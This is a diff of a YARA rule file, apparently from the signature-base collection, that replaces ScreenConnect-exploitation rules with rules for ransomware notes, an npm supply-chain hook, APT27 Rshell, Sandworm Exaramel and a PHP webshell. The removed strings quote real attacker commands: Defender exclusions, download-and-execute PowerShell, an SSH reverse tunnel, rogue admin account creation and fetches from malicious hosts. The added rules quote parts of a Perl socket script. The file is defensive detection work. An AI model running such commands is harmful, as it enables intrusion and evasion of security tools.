+		date = "2025-11-24"
+		modified = "2025-12-16"
+		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L63-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "50967a07a9789f20ccbc882c3b9e3142f0c28068c0a58b9d8927d725d02bf289"
-		score = 75
+		hash = "c4bc2afd133916f064f2fb7d1e2e067ea65db33463eeae2fa54a9860a6303865"
+		logic_hash = "7472fc4759bbf03abd05a0eade1144c7ca3ab31af26ed4eab4028056027b2e47"
+		score = 80
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "<Users xmlns:xsi="
-		$a2 = "<CreationDate>"
-		$s1 = "@poc.com</Email>"
-		$f1 = "<LastLoginDate>0001"
+		$x1 = "\"preinstall\": \"node setup_bun.js\""
 
 	condition:
-		filesize < 200KB and all of ( $a* ) and $s1 and not 1 of ( $f* )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Screenconnect_Exploitation_Artefacts_Feb24 : SCRIPT
+rule SIGNATURE_BASE_SUSP_RANSOMWARE_Indicator_Jul20 : FILE
 {
 	meta:
-		description = "Detects post exploitation indicators observed by HuntressLabs in relation to the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
-		author = "Florian Roth"
-		id = "079f4153-8bc7-574f-b6fa-af5536b842ab"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L62-L103"
+		description = "Detects ransomware indicator"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6036fdfd-8474-5d79-ac75-137ac2efdc77"
+		date = "2020-07-28"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_generic.yar#L2-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f0d5f878847da1afb0d7b83e84bd337cfa67c36da2cbb33af712ed4ffad490a"
-		score = 75
-		quality = 83
-		tags = "SCRIPT"
+		logic_hash = "3dd1b29f45afba16d58619416e0d420acd38fb8ae1fc846035229a27b9e5c9d9"
+		score = 60
+		quality = 85
+		tags = "FILE"
+		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
+		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
+		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
 
 	strings:
-		$x01 = "-c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}"
-		$x02 = ".msi c:\\mpyutd.msi"
-		$x03 = "/MyUserName_$env:UserName"
-		$x04 = " -OutFile C:\\Windows\\Help\\"
-		$x05 = "/Create /TN \\\\Microsoft\\\\Windows\\\\Wininet\\\\UserCache_"
-		$x06 = "$e = $r + \"ssh.exe\""
-		$x07 = "Start-Process -f $e -a $args -PassThru -WindowStyle Hidden).Id"
-		$x08 = "-R 9595:localhost:3389 -p 443 -N -oStrictHostKeyChecking=no "
-		$x09 = "chromeremotedesktophost.msi', $env:ProgramData+"
-		$x10 = "9595; iwr -UseBasicParsing "
-		$x11 = "curl  https://cmctt.]com/pub/media/wysiwyg/"
-		$x12 = ":8080/servicetest2.dll"
-		$x13 = "/msappdata.msi c:\\mpyutd.msi"
-		$x14 = "/svchost.exe -OutFile "
-		$x15 = "curl http://minish.wiki.gd"
-		$x16 = " -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile "
-		$x17 = "rundll32.exe' -Headers @"
-		$x18 = "/nssm.exe' -Headers @"
-		$x19 = "c:\\programdata\\update.dat UpdateSystem"
-		$x20 = "::size -eq 4){\\\"TVqQAA" ascii wide
-		$x21 = "::size -eq 4){\"TVqQAA" ascii wide
-		$x22 = "-nop -c [System.Reflection.Assembly]::Load(([WmiClass]'root\\cimv2:System_"
-		$xp0 = "/add default test@2021! /domain"
-		$xp1 = "/add default1 test@2021! /domain"
-		$xp2 = "oldadmin Pass8080!!"
-		$xp3 = "temp 123123qwE /add "
-		$xp4 = "oldadmin \"Pass8080!!\""
-		$xp5 = "nssm set xmrig AppDirectory "
+		$ = "Decrypt.txt" ascii wide
+		$ = "DecryptFiles.txt" ascii wide
+		$ = "Decrypt-Files.txt" ascii wide
+		$ = "DecryptFilesHere.txt" ascii wide
+		$ = "DECRYPT.txt" ascii wide
+		$ = "DecryptFiles.txt" ascii wide
+		$ = "DECRYPT-FILES.txt" ascii wide
+		$ = "DecryptFilesHere.txt" ascii wide
+		$ = "DECRYPT_INSTRUCTION.TXT" ascii wide
+		$ = "FILES ENCRYPTED.txt" ascii wide
+		$ = "DECRYPT MY FILES" ascii wide
+		$ = "DECRYPT-MY-FILES" ascii wide
+		$ = "DECRYPT_MY_FILES" ascii wide
+		$ = "DECRYPT YOUR FILES" ascii wide
+		$ = "DECRYPT-YOUR-FILES" ascii wide
+		$ = "DECRYPT_YOUR_FILES" ascii wide
+		$ = "DECRYPT FILES.txt" ascii wide
 
 	condition:
-		1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 1400KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Command_Line_Combos_Feb24_2 : SCRIPT FILE
+
+rule SIGNATURE_BASE_MAL_Ransomware_Wadhrama : FILE
 {
 	meta:
-		description = "Detects suspicious command line combinations often found in post exploitation activities"
-		author = "Florian Roth"
-		id = "d9bc6083-c3ca-5639-a9df-483fea6d0187"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L105-L118"
+		description = "Detects Wadhrama Ransomware via Imphash"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f7de40e9-fe22-5f14-abc6-f6611a4382ac"
+		date = "2019-04-07"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mal_ransom_wadharma.yar#L3-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0cd7b4771aa8fd622e873c5cdc6689d24394e5faf026b36d5f228ac09f4e0441"
+		logic_hash = "5d78837ed7cb8914be0990859751cf64603ee5a5ad135541c60c6ae145046412"
 		score = 75
 		quality = 85
-		tags = "SCRIPT, FILE"
-
-	strings:
-		$sa1 = " | iex"
-		$sa2 = "iwr -UseBasicParsing "
+		tags = "FILE"
+		hash1 = "557c68e38dce7ea10622763c10a1b9f853c236b3291cd4f9b32723e8714e5576"
 
 	condition:
-		filesize < 2MB and all of them
+		uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "f86dec4a80961955a89e7ed62046cc0e"
 }
-rule SIGNATURE_BASE_SUSP_PS1_Combo_Transfersh_Feb24 : SCRIPT
+rule SIGNATURE_BASE_APT_MAL_APT27_Rshell_Jul24 : MALWARE RSHELL___SYSUPDATE FILE
 {
 	meta:
-		description = "Detects suspicious PowerShell command that downloads content from transfer.sh as often found in loaders"
-		author = "Florian Roth"
-		id = "fd14cca5-9cf8-540b-9d6e-39ca2c267272"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L120-L135"
+		description = "YARA rule to detect RSHELL of APT27"
+		author = "Bundesamt fuer Verfassungsschutz, modified by Florian Roth"
+		id = "67c8ac4e-8e2f-5cca-90cb-5d5fdf6f86b5"
+		date = "2024-07-11"
+		modified = "2024-12-12"
+		reference = "https://x.com/bfv_bund/status/1811364839656185985?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_rshell.yar#L2-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64d4343ecdcbc4a28571557bec2f31c1ff73c2ecf63d0feaa0a71001bb9bf499"
-		score = 70
+		logic_hash = "be5f6281d722bd07e53acd459c794fe3ae870a05ed8979de4c28d357110617bd"
+		score = 75
 		quality = 85
-		tags = "SCRIPT"
+		tags = "MALWARE, RSHELL / SYSUPDATE, FILE"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		malware = "RSHELL / SYSUPDATE"
+		hash1 = "0433edfad648e1e29be54101abaded690302dc7e49ad916cfbbddf99b3ade12c"
+		hash2 = "10bb89fdf25c88d3c5623e8d68573124c9a42549750014e3675e2ca342aeba4a"
+		hash3 = "2603e1f61363451891c97b0c4ce8acfbfb680d3df4282f9d151ecce3a5679616"
+		hash4 = "70dac42491f8f19568a5d7b1d10b29f732a88d75e7f2bfa07b23202bacadf56f"
+		hash5 = "b988a6583ce40f07e5fc8e890ae2b1c84a93db8a2e3ca8769241b94bea332a7a"
+		hash6 = "c4fe1e56f601d411e2385352606524fb8bbf773bc2ba14889a8de605c2d14da0"
+		hash7 = "c787144d285fcca8a542f7a5525a37bcd089b39068b9a4db7fe3554ee6c08301"
+		hash8 = "ddaa4d23e4651a517fffbd29f0924607ba6b6253171144da5e49237afe91666b"
 
 	strings:
-		$x1 = ".DownloadString('https://transfer.sh"
-		$x2 = ".DownloadString(\"https://transfer.sh"
-		$x3 = "Invoke-WebRequest -Uri 'https://transfer.sh"
-		$x4 = "Invoke-WebRequest -Uri \"https://transfer.sh"
+		$a1 = "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%" ascii
+		$a2 = "/proc/self/exe" ascii
+		$s1 = "HISTFILE" ascii fullword
+		$s2 = "/tmp/guid" ascii fullword
+		$sop1 = { e8 ?? ?? ?? ?? c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? }
+		$sop2 = { c7 43 04 00 00 00 00 8b 3b 85 ff 7e 2? e8 ?? ?? 0? 00 85 c0 7e 0? f7 d8 }
 
 	condition:
-		1 of them
+		( uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and filesize < 2MB and all of ( $a* ) and 2 of ( $s* ) or 3 of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lockbit_Ransomnote_Feb24
+rule SIGNATURE_BASE_SVG_Loadurl : FILE
 {
 	meta:
-		description = "Detects the LockBit ransom note file 'LockBit-DECRYPT.txt' which is a sign of a LockBit ransomware infection"
-		author = "Florian Roth"
-		id = "b2fcb2a7-49e8-520c-944f-6acd5ded579b"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L137-L149"
+		description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c3d4c95f-ef8b-52ff-9cf9-d66d9b99a490"
+		date = "2015-05-24"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/psjCCc"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cryptowall_svg.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fe07c33de1971b1f9430851dec4b8cd9f3ac7f087f0de18a2da4a390891b674"
-		score = 75
+		logic_hash = "d9e40694e2d0099495289a2074e266bace9b0d9d776391020a1527eaabd2a395"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac8ef9df208f624be9c7e7804de55318"
+		hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"
+		hash3 = "7e2be5cc785ef7711282cea8980b9fee"
+		hash4 = "4e2c6f6b3907ec882596024e55c2b58b"
 
 	strings:
-		$x1 = ">>>> Your personal DECRYPTION ID:"
+		$s1 = "</svg>" nocase
+		$s2 = "<script>" nocase
+		$s3 = "location.href='http" nocase
 
 	condition:
-		1 of them
+		all of ( $s* ) and filesize < 600
 }
-rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lazy_Ransomnote_Feb24
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell : FILE
 {
 	meta:
-		description = "Detects the Lazy ransom note file 'HowToRestoreYourFiles.txt' which is a sign of a Lazy ransomware infection"
-		author = "Florian Roth"
-		id = "287dfd67-8d0d-5906-b593-3af42a5a3aa4"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L151-L163"
+		description = "Detects P.A.S. PHP webshell - Based on DHS/FBI JAR-16-2029 (Grizzly  Steppe)"
+		author = "FR/ANSSI/SDO (modified by Florian Roth)"
+		id = "862aab77-936e-524c-8669-4f48730f4ed5"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c9416d05f0bd9aab9d6108380c1b5364f4c4e112b6e0726202f083eaacfdcf56"
-		score = 75
+		logic_hash = "977ee0fdf0e92ccea6b71fea7b2c7aed2965c6966d8af86230ccb0f95b286694"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$x1 = "All Encrypted files can be reversed to original form and become usable"
+		$php = "<?php"
+		$strreplace = "(str_replace("
+		$md5 = ".substr(md5(strrev($"
+		$gzinflate = "gzinflate"
+		$cookie = "_COOKIE"
+		$isset = "isset"
 
 	condition:
-		1 of them
+		( filesize > 20KB and filesize < 200KB ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_MAL_Signingcert_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Ziparchivefile
 {
 	meta:
-		description = "Detects PE files signed with a certificate used to sign malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
-		author = "Florian Roth"
-		id = "f25ea77a-1b4e-5c13-9117-eedf0c20335a"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L166-L184"
+		description = "Detects an archive file created by P.A.S. for download operation"
+		author = "FR/ANSSI/SDO (modified by Florian Roth)"
+		id = "081cc65b-e51c-59fc-a518-cd986e8ee2f7"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L30-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "824efe1fa441322d891805df9a1637ebb44d18889572604acc125bf79a2d1083"
-		score = 75
+		logic_hash = "c15e7022f45ec211ba635d6cd31bab16f4fb0d3038fb19d5765e0f751c14a826"
+		score = 80
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b"
-		hash2 = "e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793"
+		tags = ""
 
 	strings:
-		$s1 = "Wisdom Promise Security Technology Co." ascii
-		$s2 = "Globalsign TSA for CodeSign1" ascii
-		$s3 = { 5D AC 0B 6C 02 5A 4B 21 89 4B A3 C2 }
+		$s1 = "Archive created by P.A.S. v."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70000KB and all of them
+		$s1
 }
-
-rule SIGNATURE_BASE_MAL_CS_Loader_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Perlnetworkscript : FILE
 {
 	meta:
-		description = "Detects Cobalt Strike malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
-		author = "Florian Roth"
-		id = "6c9914a4-b079-5a39-9d3b-7b9a2b54dc2b"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L186-L206"
+		description = "Detects PERL scripts created by P.A.S. webshell"
+		author = "FR/ANSSI/SDO"
+		id = "1625b63f-ead7-5712-92b4-0ce6ecc49fd4"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L44-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae0e25c2dda1b727978977c674e834cd659661c597d88395a6f46ad5a179e9f0"
-		score = 75
+		logic_hash = "b170c07a005e737c8069f2cc63f869d4d3ff6593b3bfca5bcaf02d7808da6852"
+		score = 90
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe"
+		tags = "FILE"
 
 	strings:
-		$s1 = "Dll_x86.dll" ascii fullword
+		$pl_start = "#!/usr/bin/perl\n$SIG{'CHLD'}='IGNORE'; use IO::Socket; use FileHandle;"
+		$pl_status = "$o=\" [OK]\";$e=\" Error: \""
+		$pl_socket = "socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print \"$l$e$!$l"
+		$msg1 = "print \"$l OK! I\\'m successful connected.$l\""
+		$msg2 = "print \"$l OK! I\\'m accept connection.$l\""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "UpdateSystem" ) and ( pe.imphash ( ) == "0dc05c4c21a86d29f1c3bf9cc5b712e0" or $s1 ) )
+		filesize < 6000 and ( $pl_start at 0 and all of ( $pl* ) ) or any of ( $msg* )
 }
-
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Indicators_Feb24 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Sqldumpfile
 {
 	meta:
-		description = "Detects Lockbit ransomware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
-		author = "Florian Roth"
-		id = "108430c8-4fe5-58a1-b709-539b257c120c"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L208-L228"
+		description = "Detects SQL dump file created by P.A.S. webshell"
+		author = "FR/ANSSI/SDO"
+		id = "4c26feeb-3031-5c91-9eeb-4b5fe9702e39"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L64-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4cd6b1a1bc57bf25c71f6bc228f45e4a996f9d9d391aeb3dda9c7d7857610bc"
-		score = 75
+		logic_hash = "c34abcada22fdf462fd66cc2da18ab9e54215defc6f7a7a95b5a80d1155a2ffe"
+		score = 90
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0"
+		tags = ""
 
 	strings:
-		$op1 = { 76 c1 95 8b 18 00 93 56 bf 2b 88 71 4c 34 af b1 a5 e9 77 46 c3 13 }
-		$op2 = { e0 02 10 f7 ac 75 0e 18 1b c2 c1 98 ac 46 }
-		$op3 = { 8b c6 ab 53 ff 15 e4 57 42 00 ff 45 fc eb 92 ff 75 f8 ff 15 f4 57 42 00 }
+		$ = "-- [ SQL Dump created by P.A.S. ] --"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "914685b69f2ac2ff61b6b0f1883a054d" or 2 of them ) or all of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_MSI_Mpyutils_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Key
 {
 	meta:
-		description = "Detects malicious MSI package mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
-		author = "Florian Roth"
-		id = "e7794336-a325-5b92-8c25-81ed9cb28044"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L230-L247"
+		description = "Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...]"
+		author = "FR/ANSSI/SDO"
+		id = "8078de62-3dd2-5ee0-8bda-f508e4013144"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L78-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ba20db486e5d3c29c9702e10628fb3c0e55e52bbec74e3a86ed6511a6475b82f"
-		score = 70
+		logic_hash = "056503a2c240a641cd2292a30ab1090e3a358cb4d57dca83b836ecb1bc62ed6b"
+		score = 80
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600"
+		tags = ""
 
 	strings:
-		$s1 = "crypt64ult.exe" ascii fullword
-		$s2 = "EXPAND.EXE" wide fullword
-		$s6 = "ICACLS.EXE" wide fullword
+		$ = "odhyrfjcnfkdtslt"
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 20000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Beacon_Unknown_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Name_Encrypted
 {
 	meta:
-		description = "Detects malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709 "
-		author = "Florian Roth"
-		id = "9299fd44-5327-5a73-8299-108b710cb16e"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L249-L268"
+		description = "Detects the specific name of the configuration file in Exaramel malware as seen in sample e1ff72[...]"
+		author = "FR/ANSSI/SDO"
+		id = "1c06f5fc-3435-51cd-92fb-17a4ab6b63ad"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L92-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fd6ebc6676d677d6bc19398026eee7b7d2f9727ba7a3c79d1e970a6dc19548aa"
-		score = 75
+		logic_hash = "f65d59381403534a2c2f39d66c7c62bf1540eafc9aad1ad73de1809e91c42446"
+		score = 80
 		quality = 85
-		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
-		hash1 = "6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090"
-		hash2 = "b0adf3d58fa354dbaac6a2047b6e30bc07a5460f71db5f5975ba7b96de986243"
-		hash3 = "c0f7970bed203a5f8b2eca8929b4e80ba5c3276206da38c4e0a4445f648f3cec"
+		tags = ""
 
 	strings:
-		$s1 = "Driver.dll" wide fullword
-		$s2 = "X l.dlT" ascii fullword
-		$s3 = "$928c7481-dd27-8e23-f829-4819aefc728c" ascii fullword
+		$ = "configtx.json"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20121
+rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_File_Plaintext
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20121.xml"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bf30bdbb-0153-5ae2-bf42-4bd9e4a2f088"
-		date = "2015-01-18"
-		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_querty_fiveeyes.yar#L3-L26"
+		description = "Detects contents of the configuration file used by Exaramel (plaintext)"
+		author = "FR/ANSSI/SDO"
+		id = "6f0d834b-e6c8-59e6-bf9a-b4fd9c0b2297"
+		date = "2021-02-15"
+		modified = "2024-05-25"
+		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L106-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
-		logic_hash = "e2660abf4959bc57bcf9d95d974cd20718d5d27f371109cb4526cee208544530"
-		score = 75
-		quality = 85
+		logic_hash = "536327d5216372a3fd2f4dad0a21be2778ce2930212daf0a8628ecbdab49b46e"
+		score = 80
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
-		$s1 = "<name>20121.dll</name>" fullword ascii
-		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<platform type=\"1\">" fullword ascii
-		$s5 = "</plugin>" fullword ascii
-		$s6 = "</pluginConfig>" fullword ascii
